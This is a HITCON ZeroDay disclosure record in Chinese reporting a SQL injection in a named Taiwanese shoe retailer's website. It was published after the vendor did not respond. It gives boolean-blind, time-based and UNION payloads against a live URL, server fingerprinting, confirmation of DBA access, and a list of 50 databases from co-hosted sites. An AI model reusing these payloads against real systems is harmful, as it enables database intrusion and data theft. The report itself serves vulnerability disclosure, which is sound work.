Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00054
- Vendor: QWQ創意鞋坊
- Title: QWQ創意鞋坊存在注入,影響同主機至少10個站
- Introduction: 高權限資料庫注入漏洞
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2016/03/10 17:03:04 : 新提交 (由 鄉民 更新此狀態)
- 2016/03/16 01:42:15 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/04/04 19:29:25 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/05/25 01:30:57 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
詳細資料
- ZDID:ZD-2016-00054
- 通報者:UCCU (鄉民)
- 風險:嚴重
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
敘述
問題網址:http://www.qwq.com.tw/prod_list.php?class_id=2
注入點: class_id
Parameter: class_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class_id=2 AND 2380=2380
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: class_id=2 AND (SELECT * FROM (SELECT(SLEEP(30)))ylUm)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: class_id=2 UNION ALL SELECT CONCAT(0x7171627071,0x6e497856735048777a4b586a444f6a686e4c4e4849486f74794d616644724f6452596b4a4d674c49,0x7178707071),NULL-- -
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
current user is DBA: True
available databases [50]:
[] #mysql50#c_c_chen_db-1040923
[] #mysql50#db_Breville-test
[] #mysql50#db_pinoh-1050207
[] #mysql50#db_pinoh-1050208
[] acnt
[] c_c_chen_db
[] db_amigosoft
[] db_amigosoft1022
[] db_amigosoft_cn
[] db_amigosoft_cn1022
[] db_Breville
[] db_Breville1040917
[] db_Breville1041011
[] db_Breville_cn
[] db_clife
[] db_hunter_cn
[] db_pinoh
[] db_pinoh1040917
[] db_pinoh_cn
[] db_shark
[] db_transcom
[] efun_db
[] efun_gb_db
[] guan_nan_2_db
[] guan_nan_db
[] information_schema
[] jcbio_db
[] jia_mei_cn_db
[] jia_mei_db
[] jiaen_tax
[] mem2_en_db
[] mem2_esp_db
[] mem2_rus_db
[] mysql
[] o_dear_db
[] o_dear_gb_db
[] o_dear_sales_system
[] pisco_db
[] qwq_db
[] seven_db
[] shinhuaforest_db
[] shinhuaforest_db1040922
[] skypro_db
[] smf_db
[] sugaru_db
[] taccn
[] taccn_tax
[] test
[] tnsuccess_db
[] yengyue_db